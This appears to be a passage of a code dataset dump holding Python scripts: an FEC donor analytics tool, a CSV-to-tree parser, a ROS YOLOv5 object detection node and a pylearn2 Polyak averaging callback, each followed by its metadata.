get_directory(self):\n return self._directory\n\n def get_artists(self):\n return self._all_artists\n\n @staticmethod\n def _check_exists(name, array):\n for item in array:\n if item.get_name() == name:\n return item\n return None\n\n @staticmethod\n def get_counter():\n return Playlist._counter\n", "sub_path": "musicmodifier/playlist.py", "file_name": "playlist.py", "file_ext": "py", "file_size_in_byte": 2541, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "musicmodifier.utilities.file_iterator", "line_number": 19, "usage_type": "call"}, {"api_name": "mutagen.easyid3.EasyID3", "line_number": 24, "usage_type": "call"}, {"api_name": "musicmodifier.artist.Artist", "line_number": 36, "usage_type": "call"}, {"api_name": "musicmodifier.album.Album", "line_number": 45, "usage_type": "call"}, {"api_name": "musicmodifier.track.Track", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "12711027", "text": "import csv, re\nfrom collections import defaultdict\nimport numpy as np\n\ndateformat = re.compile(r'[0-9]{8}\\b')\nzipformat = re.compile(r'[0-9]{5}\\b')\nnameformat = re.compile(r'[A-Za-z,\\s]+')\n\ndef find_repeat_donors(INDIV_Data_Headers):\n\n donor_dict = defaultdict(list)\n recipient_dict = defaultdict(list)\n\n inputdata = 'input/itcont.txt'\n with open(inputdata, newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter='|')\n for index, line in enumerate(csvreader):\n if not check_record_legal(line, INDIV_Data_Headers):\n print('Line {} in {} is invalid.'.format(index+1, inputdata))\n else:\n CmetId, Name, ZipCode, TransactionDate, TransactionAmount, OtherID = extract_fields(line, INDIV_Data_Headers)\n # Use the combination to 
identify a unique donor\n                DonorId = re.sub(r',?\\s+', '_', Name) + '_' + ZipCode\n\n                TransactionYear = TransactionDate[4:]\n                donor_dict[DonorId].append(int(TransactionYear))\n\n                # Reference: https://stackoverflow.com/a/39537308/2709595\n                target = TransactionYear + '_' + CmetId + '_' + ZipCode\n                recipient_dict[target].append(int(TransactionAmount))\n\n    repeat_donor_latest_year = {}\n\n    for DonorId, years in donor_dict.items():\n        if len(years) > 1:\n            # Save the latest calendar year only\n            repeat_donor_latest_year[DonorId] = str(max(years))\n\n    return repeat_donor_latest_year, recipient_dict\n\ndef extract_fields(line, INDIV_Data_Headers):\n\n    # Recipient of contribution\n    CmetId = line[INDIV_Data_Headers.index('CMTE_ID')]\n    # Name of the donor\n    Name = line[INDIV_Data_Headers.index('NAME')]\n    # Zip code of contributor (use the first five digits/characters)\n    ZipCode = line[INDIV_Data_Headers.index('ZIP_CODE')][:5]\n    # Date of transaction\n    TransactionDate = line[INDIV_Data_Headers.index('TRANSACTION_DT')]\n    # Amount of transaction\n    TransactionAmount = line[INDIV_Data_Headers.index('TRANSACTION_AMT')]\n    # Whether contribution came from a person or an entity\n    OtherID = line[INDIV_Data_Headers.index('OTHER_ID')]\n\n    return CmetId, Name, ZipCode, TransactionDate, TransactionAmount, OtherID\n\ndef check_record_legal(line, INDIV_Data_Headers):\n    \n    CmetId, Name, ZipCode, TransactionDate, TransactionAmount, OtherID = extract_fields(line, INDIV_Data_Headers)\n\n    # Use equality comparisons, not identity ('is'), for string checks\n    if (OtherID == '') and (TransactionDate != '') and (dateformat.match(TransactionDate)) and (ZipCode != '') and (zipformat.match(ZipCode)) and (Name != '') and (nameformat.match(Name)) and (CmetId != '') and (TransactionAmount != ''):\n        return True\n    else:\n        return False\n\ndef read_percentile():\n\n    with open('input/percentile.txt') as f:\n        percentile = f.readline()\n    # 1-100\n    if 1 <= float(percentile) <= 100:\n        return percentile\n    else:\n        print('The percentile input is invalid.')\n        return None\n\ndef calculate_running_percentile(contributions, percentile):\n\n    # Reference: https://stackoverflow.com/a/26071170/2709595\n    idx = float(percentile) / 100 * (len(contributions) - 1)\n    idx = int(idx + 0.5)\n    return round(contributions[np.argpartition(contributions, idx)[idx]])\n\ndef main():\n\n    # Source: https://classic.fec.gov/finance/disclosure/metadata/indiv_header_file.csv\n    INDIV_Data_Headers = 'CMTE_ID,AMNDT_IND,RPT_TP,TRANSACTION_PGI,IMAGE_NUM,TRANSACTION_TP,ENTITY_TP,NAME,CITY,STATE,ZIP_CODE,EMPLOYER,OCCUPATION,TRANSACTION_DT,TRANSACTION_AMT,OTHER_ID,TRAN_ID,FILE_NUM,MEMO_CD,MEMO_TEXT,SUB_ID'.split(',')\n\n    repeat_donor_latest_year, recipient_dict = find_repeat_donors(INDIV_Data_Headers)\n    percentile = read_percentile()\n\n    outputfile = 'output/repeat_donors.txt'\n    with open(outputfile, 'w') as output:\n        for target, value in recipient_dict.items():\n            TransactionYear = target.split('_')[0]\n            CmetId = target.split('_')[1]\n            ZipCode = target.split('_')[2]\n            contributions = []\n            TotalAmount = 0\n            for index, DonorId in enumerate(list(repeat_donor_latest_year.keys())):\n                LatestYear = repeat_donor_latest_year[DonorId]\n                if (LatestYear == TransactionYear) and (percentile is not None):\n                    TotalAmount += value[index]\n                    contributions.append(TotalAmount)\n            nearest_rank_amt = calculate_running_percentile(contributions, percentile)\n            result = '|'.join([CmetId, ZipCode, TransactionYear, str(nearest_rank_amt), str(TotalAmount), str(index+1)])\n            output.write(result)\n            output.write('\\n')\n\nif __name__ == '__main__':\n    main()",
"sub_path": "src/donation-analytics.py", "file_name": "donation-analytics.py", "file_ext": "py", "file_size_in_byte": 4761, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.compile", "line_number": 5, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 6, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 7, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 11, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 12, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.argpartition", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "69191374", "text": "#! /usr/bin/python\n\nimport argparse\nimport csv\nfrom collections import defaultdict\n\ndef get_args():\n\n #create and argumentparser object('parser') that will hold all info to parse the cmd line\n parser = argparse.ArgumentParser(description = 'This script removes false frequency-code pairs from telemetry data')\n\n #positional arguments\n #number argument to input\n parser.add_argument('csv', help='csv input file')\n parser.add_argument('tree_file', help='input tree file')\n\n #parse the cmd line arguments\n return parser.parse_args()\n\ndef parse_csv():\n # names dictionary: key = frequency, value = list of real names\n names = defaultdict(dict)\n\n # opening and reading tags file\n with open(args.csv, 'r') as chars: \n #create a csv reader object\n reader = csv.reader(chars, delimiter=',')\n\n #skip the header line\n header = next(reader)\n\n # read in file line by line\n for line in reader:\n\n #skip blank lines\n if not line:\n continue\n \n else:\n # need to ask if key exists already\n if line[0] in names:\n # same as appending to a regular list\n names[line[0]].append(line[1])\n else:\n names[line[0]] = []\n names[line[0]].append(line[1])\n\n #check our work\n for name,value in names.items():\n print(name, value)\n \n return names\n\ndef parse_tree(names_dict):\n\n i=1\n # open, read, and parse the telemetry data file\n with open(args.tree_file, 'r') as tree:\n for line in tree:\n\n #skip the header, could make the value an optional input\n if '#NEXUS' in line:\n print(line, end=' ')\n continue\n elif 'Begin' in line:\n print(line, end=' ')\n continue\n elif 'Translate' in line:\n print(line, end=' ')\n continue\n else:\n for value,name in names_dict.items():\n if str(name) in line:\n print(name+',')\n else:\n continue\n\n\ndef main():\n names_dict = parse_csv()\n parse_tree(names_dict)\n\n#get the arguments before calling main\nargs = get_args()\n\n#execute the program by calling main. __ __allow you to call these functions in other scripts and not just through this one\nif __name__ == '__main__':\n main() \n\n\n", "sub_path": "LTPs132/csv-to-matrix.py", "file_name": "csv-to-matrix.py", "file_ext": "py", "file_size_in_byte": 2539, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "362209741", "text": "#! 
/home/jyp/.miniconda3/envs/yolo/bin/python\n\nimport argparse\nimport time\nfrom pathlib import Path\nimport rospy\nimport std_msgs.msg\nfrom rospkg import RosPack\nfrom std_msgs.msg import UInt8\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Polygon, Point32\nfrom yolov5.msg import BoundingBox, BoundingBoxes\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom skimage.transform import resize\n\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom numpy import random\nimport numpy as np\nfrom models.experimental import attempt_load\nfrom utils.datasets import LoadStreams, LoadImages\nfrom utils.general import check_img_size, check_requirements, check_imshow, non_max_suppression, apply_classifier, \\\n scale_coords, xyxy2xywh, strip_optimizer, set_logging, increment_path\nfrom utils.plots import plot_one_box\nfrom utils.torch_utils import select_device, load_classifier, time_synchronized\nfrom utils.datasets import letterbox\n\n# Deep learning imports\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\n\nimport os\npackage = RosPack()\npackage_path = package.get_path('yolov5')\n\nclass detectManager:\n def __init__(self):\n # print(\"\\ndetect init\\n\")\n self.weights = rospy.get_param('~weights')\n self.source = rospy.get_param('~source')\n self.view_img = rospy.get_param('~view_img')\n self.save_txt = rospy.get_param('~save_txt')\n self.img_size = rospy.get_param('~img_size')\n self.name = rospy.get_param('~name')\n self.exist_ok = rospy.get_param('~exist_ok')\n self.project = rospy.get_param('~project')\n self.device = str(rospy.get_param('~device'))\n\n self.augment = rospy.get_param('~augment')\n self.iou_thres = rospy.get_param('~iou_thres')\n if(rospy.get_param('~classes') == 'None'):\n self.classes = None\n else:\n self.classes = rospy.get_param('~classes')\n self.agnostic_nms = rospy.get_param('~agnostic_nms')\n self.conf_thres = rospy.get_param('~conf_thres')\n self.save_conf = rospy.get_param('~save_conf')\n\n # Initialize width and height\n self.h = 0\n self.w = 0\n\n # Load other parameters\n self.gpu_id = rospy.get_param('~gpu_id', 0)\n self.network_img_size = rospy.get_param('~img_size', 416)\n self.publish_image = rospy.get_param('~publish_image')\n\n self.image_topic = rospy.get_param('~image_topic')\n\n # Load CvBridge\n self.bridge = CvBridge()\n # Load publisher topics\n self.detected_objects_topic = rospy.get_param('~detected_objects_topic')\n self.published_image_topic = rospy.get_param('~detections_image_topic')\n\n # Define subscribers\n self.image_sub = rospy.Subscriber(\n self.image_topic, Image, self.image_callback, queue_size=1, buff_size=2**24)\n\n # Define publishers\n self.pub_ = rospy.Publisher(\n self.detected_objects_topic, BoundingBoxes, queue_size=10)\n self.pub_viz_ = rospy.Publisher(\n self.published_image_topic, Image, queue_size=10)\n rospy.loginfo(\"Launched node for object detection\")\n self.path = package_path\n # print(\"\\nbehind spin\\n\")\n # Spin\n rospy.spin()\n\n def image_callback(self, data):\n # Convert the image to OpenCV\n try:\n self.cv_image = self.bridge.imgmsg_to_cv2(data, \"rgb8\")\n except CvBridgeError as e:\n print(e) \n \n #a = input()\n # Initialize detection results\n detection_results = BoundingBoxes()\n detection_results.header = data.header\n detection_results.image_header = data.header\n\n # Configure input\n input_img = self.imagePreProcessing(self.cv_image)\n input_img = 
Variable(input_img.type(torch.FloatTensor))\n\n # Get detections from network\n with torch.no_grad():\n detections = self.detect(self.cv_image, data)\n # detections = non_max_suppression(\n # detections, 80, self.confidence_th, self.nms_th)\n return 0\n\n\n def imagePreProcessing(self, img):\n # Extract image and shape\n img = np.copy(img)\n img = img.astype(float)\n height, width, channels = img.shape\n\n if (height != self.h) or (width != self.w):\n self.h = height\n self.w = width\n\n # Determine image to be used\n self.padded_image = np.zeros(\n (max(self.h, self.w), max(self.h, self.w), channels)).astype(float)\n\n # Add padding\n if (self.w > self.h):\n self.padded_image[(self.w-self.h)//2: self.h +\n (self.w-self.h)//2, :, :] = img\n else:\n self.padded_image[:, (self.h-self.w) //\n 2: self.w + (self.h-self.w)//2, :] = img\n\n # Resize and normalize\n input_img = resize(\n self.padded_image, (self.network_img_size, self.network_img_size, 3))/255.\n\n # Channels-first\n input_img = np.transpose(input_img, (2, 0, 1))\n\n # As pytorch tensor\n input_img = torch.from_numpy(input_img).float()\n input_img = input_img[None]\n\n return input_img\n\n def visualizeAndPublish(self, output, imgIn):\n # Copy image and visualize\n imgOut = imgIn.copy()\n font = cv2.FONT_HERSHEY_SIMPLEX\n fontScale = 0.8\n thickness = 2\n for index in range(len(output.bounding_boxes)):\n label = output.bounding_boxes[index].Class\n x_p1 = output.bounding_boxes[index].xmin\n y_p1 = output.bounding_boxes[index].ymin\n x_p3 = output.bounding_boxes[index].xmax\n y_p3 = output.bounding_boxes[index].ymax\n confidence = output.bounding_boxes[index].probability\n\n # Find class color\n if label in self.classes_colors.keys():\n color = self.classes_colors[label]\n else:\n # Generate a new color if first time seen this label\n color = np.random.randint(0, 255, 3)\n self.classes_colors[label] = color\n\n imgOut = np.array(imgOut)\n # cv2.rectangle(imgOut, (int(x_p1), int(y_p1)), (int(x_p3), int(y_p3)), (color[0],color[1],color[2]),thickness)\n cv2.rectangle(imgOut, (int(x_p1), int(y_p1)), (int(x_p3), int(\n y_p3)), (int(color[0]), int(color[1]), int(color[2])), thickness)\n text = ('{:s}: {:.3f}').format(label, confidence)\n cv2.putText(imgOut, text, (int(x_p1), int(y_p1+20)), font,\n fontScale, (255, 255, 255), thickness, cv2.LINE_AA)\n\n # Publish visualization image\n image_msg = self.bridge.cv2_to_imgmsg(imgOut, \"rgb8\")\n self.pub_viz_.publish(image_msg)\n\n\n def detect(self, opencv_img, data, save_img=False):\n self.weights = os.path.join(package_path, 'yolov5/weights', self.weights)\n self.source = os.path.join(package_path,'yolov5', self.source)\n # print(self.weights)\n source, weights, view_img, save_txt, imgsz = self.source, self.weights, self.view_img, self.save_txt, self.img_size\n webcam = source.isnumeric() or source.endswith('.txt') or source.lower().startswith(\n ('rtsp://', 'rtmp://', 'http://'))\n self.project = os.path.join(package_path,'yolov5', self.project)\n # Directories\n save_dir = Path(increment_path(Path(self.project) / self.name,\n exist_ok=self.exist_ok)) # increment run\n \n (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True,\n exist_ok=True) # make dir\n\n # Initialize\n set_logging()\n device = select_device(self.device)\n half = device.type != 'cpu' # half precision only supported on CUDA\n\n # print(os.getcwd())\n # Load model\n model = attempt_load(weights, map_location=device) # load FP32 model\n stride = int(model.stride.max()) # model stride\n imgsz = 
check_img_size(imgsz, s=stride) # check img_size\n        if half:\n            model.half() # to FP16\n\n        # Second-stage classifier\n        classify = False\n        if classify:\n            modelc = load_classifier(name='resnet101', n=2) # initialize\n            modelc.load_state_dict(torch.load(\n                'weights/resnet101.pt', map_location=device)['model']).to(device).eval()\n\n        # Set Dataloader\n        vid_path, vid_writer = None, None\n        if webcam:\n            view_img = check_imshow()\n            cudnn.benchmark = True # set True to speed up constant image size inference\n            dataset = LoadStreams(source, img_size=imgsz, stride=stride)\n        else:\n            #save_img = True\n            save_img = False\n            dataset = LoadImages(source, img_size=imgsz, stride=stride)\n\n        # Get names and colors\n        names = model.module.names if hasattr(model, 'module') else model.names\n        colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]\n\n        # Run inference\n        if device.type != 'cpu':\n            model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(\n                next(model.parameters()))) # run once\n        t0 = time.time()\n\n        # path = r\"/workspace/yolov5/data/images/bus.jpg\"\n        vid_cap = None\n        #im0s = cv2.imread(path)\n        im0s = opencv_img\n        img = letterbox(im0s, 640, stride=stride)[0]\n        # Convert\n        img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n        img = np.ascontiguousarray(img)\n        # img = cv2.imread(\"\")\n\n        img = torch.from_numpy(img).to(device)\n        img = img.half() if half else img.float() # uint8 to fp16/32\n        img /= 255.0 # 0 - 255 to 0.0 - 1.0\n        if img.ndimension() == 3:\n            img = img.unsqueeze(0)\n        # Inference\n        t1 = time_synchronized()\n        # print(img.shape)\n        # print(img)\n        # print(self.conf_thres)\n        # print(self.iou_thres)\n        # print(self.classes)\n        # print(self.agnostic_nms)\n        # print(\"\\nhaha: 02394857\\n\")\n\n        pred = model(img, augment=False)[0]\n        # Apply NMS\n        pred = non_max_suppression(\n            pred, self.conf_thres, self.iou_thres, classes=self.classes, agnostic=self.agnostic_nms)\n        t2 = time_synchronized()\n        # Apply Classifier\n        if classify:\n            pred = apply_classifier(pred, modelc, img, im0s)\n        # Process detections\n        detection_results = BoundingBoxes()\n        detection_results.header = data.header\n        detection_results.image_header = data.header\n\n        for i, det in enumerate(pred): # detections per image\n\n            im0 = im0s\n            p = self.path\n            # if webcam: # batch_size >= 1\n            # p, s, im0, frame = path[i], '%g: ' % i, im0s[i].copy(), dataset.count\n            # else:\n            # p, s, im0, frame = path, '', im0s, getattr(dataset, 'frame', 0)\n            # p = Path(p) # to Path\n            save_path = str(save_dir / \"img.jpg\") # output image path; used below when save_img is set\n            txt_path = str(save_dir / \"labels\" / \"label\") # label file prefix; used below when save_txt is set\n            s = ''\n            s += '%gx%g ' % img.shape[2:] # print string\n            gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh\n            if len(det):\n                # Rescale boxes from img_size to im0 size\n                det[:, :4] = scale_coords(\n                    img.shape[2:], det[:, :4], im0.shape).round()\n                # Print results\n                for c in det[:, -1].unique():\n                    n = (det[:, -1] == c).sum() # detections per class\n                    s += f\"{n} {names[int(c)]}{'s' * (n > 1)}, \" # add to string\n                \n                xmin, ymin, xmax, ymax, conf, det_class = det[0]\n                detection_msg = BoundingBox()\n                detection_msg.xmin = int(xmin.item())\n                detection_msg.xmax = int(xmax.item())\n                detection_msg.ymin = int(ymin.item())\n                detection_msg.ymax = int(ymax.item())\n                detection_msg.probability = conf.item()\n                detection_msg.Class = names[int(det_class.item())]\n                detection_results.bounding_boxes.append(detection_msg)\n\n                # Write results\n                for *xyxy, conf, cls in reversed(det):\n                    if save_txt: # Write to file\n                        xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 
4)) /\n gn).view(-1).tolist() # normalized xywh\n # label format\n line = (cls, *xywh, conf) if self.save_conf else (cls, *xywh)\n with open(txt_path + '.txt', 'a') as f:\n f.write(('%g ' * len(line)).rstrip() % line + '\\n')\n if save_img or view_img: # Add bbox to image\n label = f'{names[int(cls)]} {conf:.2f}'\n plot_one_box(xyxy, im0, label=label,\n color=colors[int(cls)], line_thickness=3)\n # Print time (inference + NMS)\n print(f'{s}Done. ({t2 - t1:.3f}s)')\n # Stream results\n if view_img:\n cv2.imshow(str(p), im0)\n cv2.waitKey(1) # 1 millisecond\n # Save results (image with detections)\n if save_img:\n if dataset.mode == 'image':\n cv2.imwrite(save_path, im0)\n else: # 'video'\n if vid_path != save_path: # new video\n vid_path = save_path\n if isinstance(vid_writer, cv2.VideoWriter):\n vid_writer.release() # release previous video writer\n fourcc = 'mp4v' # output video codec\n fps = vid_cap.get(cv2.CAP_PROP_FPS)\n w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n vid_writer = cv2.VideoWriter(\n save_path, cv2.VideoWriter_fourcc(*fourcc), fps, (w, h))\n vid_writer.write(im0)\n self.pub_.publish(detection_results)\n #if save_txt or save_img:\n # s = f\"\\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}\" if save_txt else ''\n #print(f\"Results saved to {save_dir}{s}\")\n\n print(f'Done. ({time.time() - t0:.3f}s)')\n\n\nif __name__ == '__main__':\n rospy.init_node(\"detector_manager_node\")\n rospy.loginfo(\"start detect node\")\n dm = detectManager()\n", "sub_path": "src/yolov5/yolov5/detect.py", "file_name": "detect.py", "file_ext": "py", "file_size_in_byte": 14788, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "rospkg.RosPack", "line_number": 36, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 42, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 43, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 44, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 45, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 46, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 47, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 48, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 49, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 50, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 52, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 53, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 54, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 57, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 58, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 59, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 60, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 67, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 68, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 69, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 71, "usage_type": "call"}, {"api_name": "cv_bridge.CvBridge", "line_number": 74, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 76, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 77, 
"usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 80, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 81, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 84, "usage_type": "call"}, {"api_name": "yolov5.msg.BoundingBoxes", "line_number": 85, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 86, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 87, "usage_type": "argument"}, {"api_name": "rospy.loginfo", "line_number": 88, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 92, "usage_type": "call"}, {"api_name": "cv_bridge.CvBridgeError", "line_number": 98, "usage_type": "name"}, {"api_name": "yolov5.msg.BoundingBoxes", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 130, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 176, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 178, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 182, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path", "line_number": 191, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 198, "usage_type": "call"}, {"api_name": "utils.general.increment_path", "line_number": 198, "usage_type": "call"}, {"api_name": "utils.general.set_logging", "line_number": 205, "usage_type": "call"}, {"api_name": "utils.torch_utils.select_device", "line_number": 206, "usage_type": "call"}, {"api_name": "models.experimental.attempt_load", "line_number": 211, "usage_type": "call"}, {"api_name": "utils.general.check_img_size", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.torch_utils.load_classifier", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 221, "usage_type": "call"}, {"api_name": "utils.general.check_imshow", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 228, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 228, "usage_type": "name"}, {"api_name": "utils.datasets.LoadStreams", "line_number": 229, "usage_type": "call"}, {"api_name": "utils.datasets.LoadImages", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 
237, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 237, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 241, "usage_type": "call"}, {"api_name": "time.time", "line_number": 243, "usage_type": "call"}, {"api_name": "utils.datasets.letterbox", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 255, "usage_type": "call"}, {"api_name": "utils.torch_utils.time_synchronized", "line_number": 261, "usage_type": "call"}, {"api_name": "utils.general.non_max_suppression", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.torch_utils.time_synchronized", "line_number": 274, "usage_type": "call"}, {"api_name": "utils.general.apply_classifier", "line_number": 277, "usage_type": "call"}, {"api_name": "yolov5.msg.BoundingBoxes", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 296, "usage_type": "call"}, {"api_name": "utils.general.scale_coords", "line_number": 299, "usage_type": "call"}, {"api_name": "yolov5.msg.BoundingBox", "line_number": 307, "usage_type": "call"}, {"api_name": "utils.general.xyxy2xywh", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 319, "usage_type": "call"}, {"api_name": "utils.plots.plot_one_box", "line_number": 327, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 333, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 334, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 338, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 342, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 345, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 346, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 347, "usage_type": "attribute"}, {"api_name": "cv2.VideoWriter", "line_number": 348, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 349, "usage_type": "call"}, {"api_name": "time.time", "line_number": 356, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 360, "usage_type": "call"}, {"api_name": "rospy.loginfo", "line_number": 361, "usage_type": "call"}]} +{"seq_id": "428430117", "text": "from __future__ import division\n\"\"\"\nStochastic Gradient Descent and related functionality such as\nlearning rate adaptation, momentum, and Polyak averaging.\n\nModified from pylearn2.training_algorithms.sgd by Guillaume Desjardins,\nto match:\n\n\"Learning Feature Hierarchies with Centered Deep Boltzmann Machines\",\nGregoire Montavon, Klaus-Robert Muller.\n\"\"\"\n__authors__ = \"Ian Goodfellow\"\n__copyright__ = \"Copyright 2010-2012, Universite de Montreal\"\n__credits__ = [\"Ian Goodfellow, David Warde-Farley\"]\n__license__ = \"3-clause BSD\"\n__maintainer__ = \"Ian Goodfellow, David Warde-Farley\"\n__email__ = \"goodfeli@iro\"\nfrom theano import function\nfrom pylearn2.utils import sharedX\nfrom pylearn2.training_callbacks.training_callback import TrainingCallback\nfrom pylearn2.utils import serial\n\nclass PolyakAveraging(TrainingCallback):\n \"\"\"\n See \"A Tutorial on Stochastic Approximation Algorithms\n for Training Restricted Boltzmann Machines and\n Deep Belief Nets\" by Kevin Swersky et al\n\n Notes: this is usually used with a fixed, rather than\n annealed learning rate.\n It may be used in conjunction with momentum.\n\n This 
functionality is still a work in progress. Currently,\n your model needs to implement \"add_polyak_channels\" to\n use it.\n\n The problem is that Polyak averaging shouldn't modify\n the model parameters. It should keep a second copy\n that it averages in the background. This second copy\n doesn't get to come back in and affect the learning process\n though.\n\n (IG tried having the second copy get pushed back into\n the model once per epoch, but this turned out to be\n harmful, at least in limited tests)\n\n So we need a cleaner interface for monitoring the\n averaged copy of the parameters, and we need to make\n sure the saved model at the end uses the averaged\n parameters, not the parameters used for computing\n the gradients during training.\n \"\"\"\n\n def __init__(self, model, save_path = None, kc=10, save_freq = 1):\n self.__dict__.update(locals())\n\n updates = {}\n k = sharedX(0.)\n self.param_to_mean = {}\n for param in model.get_params():\n mean = sharedX(param.get_value())\n assert type(mean) == type(param)\n self.param_to_mean[param] = mean\n updates[mean] = k / (k + kc) * mean + kc / (k + kc) * param\n updates[k] = k + 1.\n self.avg = function([], updates = updates)\n self._count = 0\n self.kc = kc\n self.k = k\n\n def __call__(self, model, dataset, algorithm):\n if self._count > 0 and self._count % self.save_freq == 0:\n self.avg()\n saved_params = {}\n for param in model.get_params():\n saved_params[param] = param.get_value()\n param.set_value(self.param_to_mean[param].get_value())\n serial.save(self.save_path, model)\n for param in model.get_params():\n param.set_value(saved_params[param])\n self._count += 1\n\n", "sub_path": "polyak.py", "file_name": "polyak.py", "file_ext": "py", "file_size_in_byte": 3034, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pylearn2.training_callbacks.training_callback.TrainingCallback", "line_number": 23, 